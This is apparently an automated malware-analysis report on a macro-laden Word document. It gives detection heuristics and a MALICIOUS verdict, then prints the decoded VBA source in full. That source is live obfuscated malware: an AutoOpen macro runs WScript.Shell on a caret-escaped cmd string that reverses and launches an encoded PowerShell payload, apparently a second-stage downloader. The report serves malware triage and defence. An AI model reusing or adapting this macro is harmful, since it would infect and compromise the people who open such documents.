Verdict: MALICIOUS
Risk Score: 310

Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1203 Exploitation for Client Execution
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of Shell() calls within the VBA macros. Additionally, OLE_VBA_WSCRIPT and OLE_VBA_CREATEOBJ firings confirm the use of WScript.Shell and CreateObject, commonly used to execute arbitrary commands. The AutoOpen macro suggests immediate execution upon opening. The script attempts to construct commands using string concatenation, likely to download and execute a second-stage payload.
Heuristics (10)
- ClamAV: Doc.Malware.Generic-6668129-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Generic-6668129-0
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- WScript.Shell usage [critical] OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script:
  Error 82430 / jZwzi / 82867 * iLwsqS SLVSFXt = CreateObject("WScript.Shell") _ . _
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
  Error 82430 / jZwzi / 82867 * iLwsqS SLVSFXt = CreateObject("WScript.Shell") _ . _
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
  Attribute VB_Name = "mpYijqLwRj" Sub AutoOpen() On Error Resume Next
- Reference to Windows Script Host [high] SC_STR_WSCRIPT: Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10927 bytes |

SHA-256: 0f3dc9bb43f05af224845bc7ebd02f22fbd68a1518174291edf3d94dfab678f7

Detection (macros.bas)
ClamAV: No threats found
Obfuscation or payload: likely
148 of 240 identifiers look randomly generated (e.g. 'dwcNZCjjdtaSa'); 3 string-concatenation chain(s), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "dwcNZCjjdtaSa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MjMiMjXLHS"
Function JUumPUlXL()
On Error Resume Next
Error UrrDWq * awfJb * EEWHY / azikIY
Error rpthQc / YDVrr
RvTnUkpqw = "MD /V" + "^:O" + "n/C " + " " + " " + Chr(1 + 0 + 4 + 0 + 29) + " ^S"
Error HSIvV * 27348
Error wswzf * BQjiU / 48649 / RzdYaw
Error Ozohi * HjidCI
wFlIwUcHf = "^et ^ ^" + " ^" + " " + "^s" + "^5" + "7W=A^A" + "C^A^g^" + "A^A^IA"
Error 70425 * vpmwmM * wzmFU * wXisO
Error KMJLp * BEcJLX / 25785 / DIsEO
ChVvMLAw = "^A" + "C" + "^" + "AgA^A" + "IA^AC" + "^A^g" + "^AAIA" + "AC^A" + "g^A^" + "AIA^A" + "C"
Error XnVzjh / 1836
Error 38139 * kDzrt
Error hHzsPq / 76287 * 98655 * zfoWqs
Error cQzLr / IkMnq * plATMk * luJlO
Error LfTQj / bGDLKW
AvdfVwn = "A^gAA^" + "IA" + "A" + "CA^g^" + "AQf^A0" + "HA7" + "B^AaAM" + "G" + "A0B" + "^QYAMG" + "A^9" + "BwO" + "^A^sG^A"
Error lkapN * 99200 * 45894 * ZpnDtW
GSPzOPKc = "^h^B^" + "QZ^A" + "I^HA^i" + "B^w^OA8" + "G^A^" + "m^Bgc^A" + "^QCA"
Error CPiRk / nHaOZS
Error rAiLo * pBAni
Error 55695 * RzadYj
Error 71956 / 96558 / 38634 * FfEtzC
Error 68818 / zzXAl
qslmPuilR = "^gA^Qb^" + "A^" + "UG" + "^A0" + "BQ^S" + "A0CA" + "l^B^w" + "^aA8" + "GA" + "^" + "2^BgbAk" + "E^"
Error iNSJG / azziS / XTmKVA / PpzSfh
Error cjPoci / JzXstY
olNSo = "A7^AQ^" + "KA^" + "8^G" + "^AmB" + "gcAQC^A" + "^gAAL^" + "Ak" + "^F^AvB"
Error QBwiLR / dCZojf / ncjVwS / 67848
Error 80646 / lJnnd
aDwvOGvzwq = "Q^SA" + "QC^A^" + "oAQ" + "^Z^A^wG" + "^A^pB^" + "gRAQGA"
Error CMCdk / hLzlmC
Error 66094 * fRHsj / 64656 / lrDIW
Error BdvAvz * jSrJrt * nVzGmi * fiDMwW
Error iEjQK / IUDXL
lJDssGCIbk = "^h" + "B^wb^Aw" + "^G" + "AuBwdA" + "^8^GA^" + "EB^gLA^" + "I^GA^" + "0"
Error 11879 * 57988 * 68207 * OsIdK
Error zsabY / BipPJ / ftCpd * DZPzT
Error BGFTMO * VLSVdo
Error YQQVwF / YzPWu * 85811 * wdhwIL
aOBwVU = "Bw" + "SAQC" + "A" + "^7^BQ" + "^" + "e^A"
JUumPUlXL = RvTnUkpqw + wFlIwUcHf + ChVvMLAw + AvdfVwn + GSPzOPKc + qslmPuilR + olNSo + aDwvOGvzwq + lJDssGCIbk + aOBwVU
Error 95575 / DYJzE
Error rMwUi / jjQoEU * DaoKt * wwwqFR
Error vwQwO / 8269 / 20672 * DiZGN
Error 28557 * zzbYw / 36593 * OVJum
End Function
Function JEnupYJwh()
On Error Resume Next
Error SjjiWv / SJYwW / kwFTmQ * WrDNla
Error 10575 / dPQMl
SDbJZwBI = "^I^HA" + "^0" + "B^w^e^A" + "kC^" + "Av^BQT" + "^A" + "^oGAk" + "A^AI^" + "A4G"
Error wsUYb / iJzaUj
Error oHPdp / aNGZB
nUCfhwz = "^ApB^A^" + "IA^kF^A" + "v" + "BQS" + "A" + "^" + "QC" + "^A^o^A" + "A^" + "aA^M^" + "GAh^B"
Error hsnNY / MMPCwu
Error 62685 / swiUt
dhWIDUzD = "^Q^" + "Z^AIH" + "^A" + "v^B" + "^g^" + "Z" + "A^sD" + "^AnA^"
Error 94245 * vuuNdT / 40655 * bbmjoY
Error wbJPq * 64109
PEuXmr = "QZ" + "^A^g^H" + "^A^l" + "^B" + "g^L^A" + "cCArA^A" + "R" + "^A" + "IGA^i^"
Error UTjGjK * CwGTq / 35533 / PYUhf
Error 61376 * GLiijm * 91942 / Siwzj
Error 70168 * EiPjV
WaFUHVW = "B" + "A" + "^JA^s" + "CA" + "n^A^" + "AXAcC" + "^A" + "rA^wYAk" + "^GAs^"
Error 101 * tJATYb * 10110 * dCWoS
Error 44989 * 49130
Error vdwDF / SDkXUW * Fwhzaf / ojVSC
Error zrAkcF * SkiHzu / 24935 * UzmCIj
pGttoVFBWc = "BgY^A" + "^UH^" + "A" + "^wBg^OA" + "^Y^H^A" + "^uBQ^Z" + "A" + "^QC" + "A^9^Aw^" + "b"
Error pEvEq * 4759
Error OCEFiB / bMIjB * 36624 / jKaXAz
LJYQHH = "^" + "AYG^" + "A" + "^y^B^A" + "J^As^"
Error sLslfo * 9114 / SVztw / BDKiRz
wiGDcBBh = "D^AnAQN" + "^AA^" + "DAx^" + "Aw^J" + "^AAC^" + "A9AA" + "^I^A" + "QE^Ai^B" + "g^Y^A^" + "QC^A" + "7^AQ^K" + "A" + "cC^A^A^"
Error cONAKd / 21190
qzCVKFChqA = "Bw^J" + "^A^gCA" + "^0BQa^A" + "^" + "wGAw" + "B^w^U" + "A^4C" + "An^A^Qb" + "^A^M^" + "H^" + "Ak^Bg^Y" + "^A^gE" + "^A"
Error 37594 / OtSSQW
Error asEVVF * 65744 * 53441 * HqGtA
Error 550 / 24451
TtKjFOW = "v^" + "AwcA^Q^" + "G" + "^A" + "hB" + "^wbA^w^" + "GAw" + "B" + "Q^" + "d" + "^" + "A^8CA^" + "0^B"
Error XKVli * 51672
Error oHVlsm / LdSiv / wrRLHW * QcfhRl
JLnltD = "^g" + "^b" + "AUG^A" + "^0" + "^Bg" + "^" + "bA^8G" + "^"
Error HSnoT * 92825 / 87131 / AjQKi
Error 33742 / jFSsQw * 43871 * WFGpow
Error 12772 * OEzhXN / BnwbAE * wtiLb
kSROHDFCF = "AjBQ^L^" + "AA" + "H" + "A3BwLAU" + "^G^A0B^" + "QaA" + "MHA" + "i^BQ^" + "ZAc" + "HA" + "vA^Q" + "^bA8G^" + "Aj^"
JEnupYJwh = SDbJZwBI + nUCfhwz + dhWIDUzD + PEuXmr + WaFUHVW + pGttoVFBWc + LJYQHH + wiGDcBBh + qzCVKFChqA + TtKjFOW + JLnltD + kSROHDFCF
Error omPKqZ / iwvGJ * CJvtSN * 79847
Error MGmJs * 8670
End Function
Function ObASoj()
On Error Resume Next
Error fkKsBz / 80200
Error zqPaq * rPiotz
Error bRsSm * nqABwc / 22641 * 13179
jzPJksJW = "B^" + "gL^A" + "^Q^D^Av" + "^Bgc^" + "A^A" + "^HAl^B" + "gc^A8C" + "^Av^Ag^" + "O^" + "AA^H^" + "A^0BAd" + "^A"
Error 98525 / FGHwa / 94673 / KliEtj
qLRizBfD = "g^" + "G^AA" + "^BA" + "^W^" + "A^M" + "DAvA^Q" + "bA^8GAj" + "^"
Error Liwri / jABFo / WzjjK / czuJl
Error 92423 / tNUWUD / DizFm * zXnoSa
Error 53929 * HopXP / 19403 * FMdSqi
QJSlJt = "B" + "^gL" + "A^w^G^" + "A^pB^wc" + "A^" + "EG" + "Ay^B^" + "g" + "^Y^" + "A8G^Ak"
Error cwIZG / GBzGv
NhNvnC = "^B^gY^" + "A^IH^" + "Ah^BQb^" + "A^8CAvA" + "g" + "^O^A^" + "A^H^A^" + "0BAd^" + "A" + "^g^" + "GA^A^Bg" + "c^" + "A^s^G"
Error 40740 / wAUHoT * Qzsszw / 24296
Error 92730 / zwqsTB / JhoFk * qWkBbv
Error frBYsl / QpoIX
Error 74862 / hfKazL / 70545 * ostuAc
Error jiklw * PmaXX / bGVSPt / lkXNvz
tihwjXP = "^Ar^" + "B^" + "QOAYHA" + "^2^BAb" + "^A^kDAv" + "A"
Error WwjZq * obZoEv
Error AtdRXI / NOzuLu / 10707 * iOLWK
Error 90433 * WRVAU / QNfzqJ / wTRbhS
Error 59639 * AEoKa
Error LjJBSs * rjirFZ
Error 60973 * dkaKLh * wBBpW * QzDOZP
hCnlbWjFqz = "gc^" + "A" + "^Y^G" + "^A^u^" + "Awc^A^" + "E^" + "GAr^B^" + "Qd^A^w" + "G^AuA^Q" + "^MA"
Error jhVVcN / wJbXbd
Error QlGcr * snYbln / 9036 * KELtYz
Error dOjVXz / MrTFtk
Error ViCWU * zcPhUF * PWsLq * WRDcq
Error MqHYBY / WVfEa * JPdRk * iisdq
TwQIwWqw = "A" + "^H" + "A3^Bw" + "LA^8C" + "A^6^" + "A^AcAQH" + "A0" + "^BA" + "aA" + "AEA"
Error 39013 / CUMQd
mQfUavVbEI = "2A^wc" + "A8C^A" + "t^B^wb" + "A^M^G" + "^AuA^" + "Q" + "YA^kH^A" + "^h^Bg" + "^Y" + "AE^G^" + "AyBQ" + "^dA" + "^M^H^"
Error 54931 / wKGbo * hIMLAL * jnXYjS
vlYHwQij = "A" + "w^B^w^b" + "AQ^H^A" + "h^B" + "gcAE^GA" + "^j" + "B^QYA" + "c^"
Error cJuhbz / EQnZt
Error LiiavU / 7706 / 53887 * MtYMf
zTORLz = "G^A^u^" + "B^QZ^A" + "^A" + "^" + "H^" + "Au" + "^A^g^" + "bA" + "E^G^A" + "p^BQ^Y^"
ObASoj = jzPJksJW + qLRizBfD + QJSlJt + NhNvnC + tihwjXP + hCnlbWjFqz + TwQIwWqw + mQfUavVbEI + vlYHwQij + zTORLz
Error 15156 / HOKdJI
Error 71735 * IQzctO / NEkmnR * UHKdG
Error WGbTQ / jkBNLh
Error KjnCSS * bLcSdJ / SQFpRt / 26046
End Function
Function nAzzLrMfvdG()
On Error Resume Next
Error QDdqG * dcuvwA
Error 96827 * Yaabsz
Error vSlIVP / 68620
Error zLliH / kbLRmZ
Error ToEusH * Sfrct / 63967 / ZwzoQS
qMMwjAdXHI = "AI^" + "H^A^" + "l^B^" + "w^Y" + "^AI^H" + "^A" + "^l^B^A"
Error vlUud * IKtOi * 21886 / VaSKt
HjDQGQfG = "c" + "AE^G^A" + "^yB" + "Q" + "^YA^" + "M^"
Error INzJhD * KGHiYw
jvQUAZSu = "G^AhB^w" + "Z^A4^" + "G^A^" + "lB^Ac" + "^A8C^" + "Av^Ag" + "OAA^" + "HA" + "^"
Error kwbfF / InXUl * PcAnGA / MRXWnl
Error 92141 * 45743 * 14904 * oArPdf
BFNOsJdr = "0B^A" + "^d" + "^A^gGA" + "A^B^wRA" + "A^F^" + "AiB^w" + "c^A"
Error 61237 / mMiMAE
Error 85673 / zWiGz / 92485 * icYOn
pYPaqEzU = "s^G^A^" + "G^B" + "^Q^b" + "A^I^H" + "Av^AQ" + "Z" + "A^sG^Au" + "^A" + "w^b^AM" + "^G" + "Au^A" + "wcA^Q"
Error 48037 / rwAZf
Error OoMbou * 90063 / QWZwG / SjoIib
Error 84677 / 24502 / 78626 * msJjjq
Error 57885 / XuGcj * 46891 / jLviC
mRnjIWh = "^H^A^uB" + "^QdA" + "8G^" + "A" + "t^B" + "^g^Y" + "AU" + "^G^" + "A^3B^" + "wLA8C" + "A6AAc^A"
nAzzLrMfvdG = qMMwjAdXHI + HjDQGQfG + jvQUAZSu + BFNOsJdr + pYPaqEzU + mRnjIWh
Error FRwzQB * lTUAS * 19075 * 62052
Error UfnUPR / JkGUv
End Function
Function LCPiiwCsXW()
On Error Resume Next
Error 22223 / 55168 * jGihF / nhjMT
Error RDWODC / OpzlV
Error 94097 * rsaQC
Error 74461 / 66531
GFsFajN = "Q^HA0" + "B" + "^Aa^Ac" + "CA^" + "9" + "A^w" + "bA0E" + "A^q^BA" + "^J^AsD" + "A" + "0B^g^"
Error 70280 * Poirj * RiHsvF / 17149
Error 35307 * zfodw / JfqQt / bUsAnz
Error ibBUQz * YOaZm
Error AFOwW / 53973 * 73179 / TOKwi
MkSwaJAG = "b^A^UG^" + "ApBA^b^" + "AM^E^" + "A^iBQZ^" + "AcF^" + "Au^A^A" + "^dAU^G" + "^A^" + "O^BAIAQ" + "HA^" + "j" + "BQ^Z^A^" + "oGA"
Error HFirlw * KIkGw
Error IOozu / FfHSHw
Error iNmdb * dZzjB * nwZUHS * 94150
Error SBzWr / GthsFo / Sfjid / oWHDl
YatkbnMcwGj = "^i^B^" + "wb" + "A" + "0CA3" + "^BQ" + "ZA^"
Error OhiXrE * zOirLM / iYHLI / MzrlEj
Error 55156 / Yqmzb * 5952 * bFdatv
iqDwwc = "4^G" + "^A^9A" + "^" + "g^Y" + "A^Q^H^A" + "L^BA" + "^J^ ^e-"
Error tkKqtY / ksSCW / Thnbl / ptSHr
Error 32502 * MjzUt
Error zWHNrf / zObws
RufGROVWZE = " ^l^l^" + "eh^sr^" + "ewo^p& " + "f^" + "oR " + " /^L %" + "^G ^"
Error 50634 * SCMasd * aXDHEG / iRoMsF
Error AMRKXL / iwWjiZ
Error RVArKr / 16933
zVzvBSwQj = "IN " + "(^ ^" + " ^ " + " ^10" + "^61" + ",^ ^ ^" + "-1^" + " ^ ^" + " ^"
Error 66770 * mTEsYH / 76681 / qNoUm
Error 32946 / wfqHAj
Error 71267 * 82851 / BSmRW / qQIJr
sSzKLYcPj = ",^ 0 ^" + " ^ )" + "d^O " + " " + "^sE" + "^t " + " ^t^Kz" + "=!" + "^t^Kz!!"
Error QzwHCk * znrnZ / jPiaM / NzwQlt
Error UXzuzR * SDDrK / cTLtFQ * iFwZQJ
huNcjHHpdDr = "^s^5" + "7W:" + "~ %" + "^G, 1" + "!&& ^" + "i^F " + "%^G " + " L^" + "E^Q "
Error 42215 / CRqIw / NzDjAi / hKOqp
Error aZinD / BFHjHv
azMal = "^" + "0 ca^l^" + "L %" + "^t^Kz" + ":~^ ^ ^" + "-^1" + "^06" + "2% " + " " + " " + Chr(1 + 0 + 4 + 0 + 29) + " "
LCPiiwCsXW = GFsFajN + MkSwaJAG + YatkbnMcwGj + iqDwwc + RufGROVWZE + zVzvBSwQj + sSzKLYcPj + huNcjHHpdDr + azMal
Error 71595 * 57924
Error aaHCC * 65385
Error 95241 * CvTqLm * 88853 / JmntTi
Error NAWlh / brEiE / 52961 / OTCDv
Error VRFFzK / 78098 * TXRjm * 15562
End Function
Attribute VB_Name = "mpYijqLwRj"
Sub AutoOpen()
On Error Resume Next
Error 50877 * 69896
Error 80640 * 76323
Error 82430 / jZwzi / 82867 * iLwsqS
SLVSFXt = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(1 + 0 + 2 + 8 + 56) + IfVBtJOR + MHozuTHI + JUumPUlXL + JEnupYJwh + ObASoj + nAzzLrMfvdG + LCPiiwCsXW + jIhVLDHFYtGT + ifNXDpTZVVw, 711730862 - 711730862)
Error BItcCs * JRPFk * 8988 / NKnLXW
Error 85878 / 36976
Error 33721 * 64194 / LaCWB * hOhOnK
Error qYWif * Qczzz
End Sub